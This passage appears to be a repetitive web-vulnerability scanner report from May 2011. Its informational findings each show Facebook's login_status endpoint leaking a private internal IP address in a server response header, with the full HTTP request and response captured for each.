GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfd683b66%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2c8e36384%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df137160ec%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2c8e36384%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3111b523c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df114f9be9c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2c8e36384%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3111b523c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2d49b6a2c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2c8e36384%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3111b523c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df34e95eb3%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2c8e36384%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3111b523c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f2d49b6a2c&origin=http%3A%2F%2Faol.sportingnews.com%2Ff2c8e36384&relation=parent&transport=postmessage&frame=f3111b523c
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.99.110
X-Cnection: close
Date: Thu, 05 May 2011 02:04:10 GMT
Content-Length: 0

20.154. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.53.32.23

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1b43d93f8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff24dfacf7c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df15c45a4c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff24dfacf7c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df396151acc%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df11b0283e8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff24dfacf7c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df396151acc&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df218e5a1c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff24dfacf7c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df396151acc&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1152b3d48%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff24dfacf7c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df396151acc&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f218e5a1c&origin=http%3A%2F%2Faol.sportingnews.com%2Ff24dfacf7c&relation=parent&transport=postmessage&frame=f396151acc
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.53.32.23
X-Cnection: close
Date: Thu, 05 May 2011 01:47:31 GMT
Content-Length: 0

20.155. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.142.118

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df12cbfaaf4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1b17e1318%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df10041f864%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1b17e1318%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3bba9da4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df36c6c0654%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1b17e1318%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3bba9da4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df25360361%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1b17e1318%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3bba9da4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df20c6edd4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1b17e1318%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3bba9da4&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f25360361&origin=http%3A%2F%2Faol.sportingnews.com%2Ff1b17e1318&relation=parent&transport=postmessage&frame=f3bba9da4
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.142.118
X-Cnection: close
Date: Thu, 05 May 2011 02:02:48 GMT
Content-Length: 0

20.156. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.74.67

Request

GET /extern/login_status.php?api_key=187288694643718&app_id=187288694643718&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df20ff4284%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff208209ea4%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1877027d4%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff208209ea4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df177f7c498%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df987fd1d%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff208209ea4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df177f7c498&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df11ef03cc%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff208209ea4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df177f7c498&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df106755564%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff208209ea4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df177f7c498&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f11ef03cc&origin=http%3A%2F%2Ftechcrunch.com%2Ff208209ea4&relation=parent&transport=postmessage&frame=f177f7c498
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.74.67
X-Cnection: close
Date: Thu, 05 May 2011 00:58:34 GMT
Content-Length: 0

20.157. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.36.143.121

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df411ae6bc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff33cefee98%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df29cbceaac%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff33cefee98%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfceba352%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df21d1319c8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff33cefee98%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfceba352&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3602fda58%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff33cefee98%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfceba352&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df634100a8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff33cefee98%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfceba352&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f3602fda58&origin=http%3A%2F%2Faol.sportingnews.com%2Ff33cefee98&relation=parent&transport=postmessage&frame=fceba352
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.143.121
X-Cnection: close
Date: Thu, 05 May 2011 01:14:01 GMT
Content-Length: 0

20.158. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.151.43

Request

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f38b20c288&origin=http%3A%2F%2Fwww.truveo.com%2Ff192839764&relation=parent&transport=postmessage&frame=f11f5dcd84
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.151.43
X-Cnection: close
Date: Thu, 05 May 2011 11:42:06 GMT
Content-Length: 0

20.159. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.82.25

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df33b771228%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff15745654%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df205a07884%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff15745654%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df378903e6%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df234b0a5fc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff15745654%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df378903e6&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df916fd9e%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff15745654%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df378903e6&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1a3dadc24%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff15745654%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df378903e6&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f916fd9e&origin=http%3A%2F%2Faol.sportingnews.com%2Ff15745654&relation=parent&transport=postmessage&frame=f378903e6
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.82.25
X-Cnection: close
Date: Thu, 05 May 2011 01:50:07 GMT
Content-Length: 0

20.160. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.170.35

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfe30beb68%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff318830124%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df33e06d948%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff318830124%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df24301464c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df33a0f8d4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff318830124%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df24301464c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2d589a038%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff318830124%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df24301464c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3e6c23abc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff318830124%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df24301464c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f2d589a038&origin=http%3A%2F%2Faol.sportingnews.com%2Ff318830124&relation=parent&transport=postmessage&frame=f24301464c
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.170.35
X-Cnection: close
Date: Thu, 05 May 2011 01:22:29 GMT
Content-Length: 0

20.161. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.36.123.118

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df20dc7d7bc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff137db79dc%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df37613e56c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff137db79dc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df27c094b1%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df20f33d92c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff137db79dc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df27c094b1&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfa178d9f8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff137db79dc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df27c094b1&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2e39f71a8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff137db79dc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df27c094b1&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=fa178d9f8&origin=http%3A%2F%2Faol.sportingnews.com%2Ff137db79dc&relation=parent&transport=postmessage&frame=f27c094b1
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.123.118
X-Cnection: close
Date: Thu, 05 May 2011 01:16:37 GMT
Content-Length: 0

20.162. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.116.45

Request

GET /extern/login_status.php?api_key=113402378708388&app_id=113402378708388&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df4a7247e4%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff208209ea4%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3e20e9ad4%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff208209ea4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1f5d23bcc%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df6192d57%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff208209ea4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1f5d23bcc&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df21f258edc%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff208209ea4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1f5d23bcc&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df33cceefa%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff208209ea4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1f5d23bcc&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f21f258edc&origin=http%3A%2F%2Ftechcrunch.com%2Ff208209ea4&relation=parent&transport=postmessage&frame=f1f5d23bcc
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.116.45
X-Cnection: close
Date: Thu, 05 May 2011 00:58:58 GMT
Content-Length: 0

20.163. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.68.111

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df33ea9cee%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff110f82284%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df140b37b6%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff110f82284%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df16efcbeb%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfdf5b1a5%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff110f82284%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df16efcbeb&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%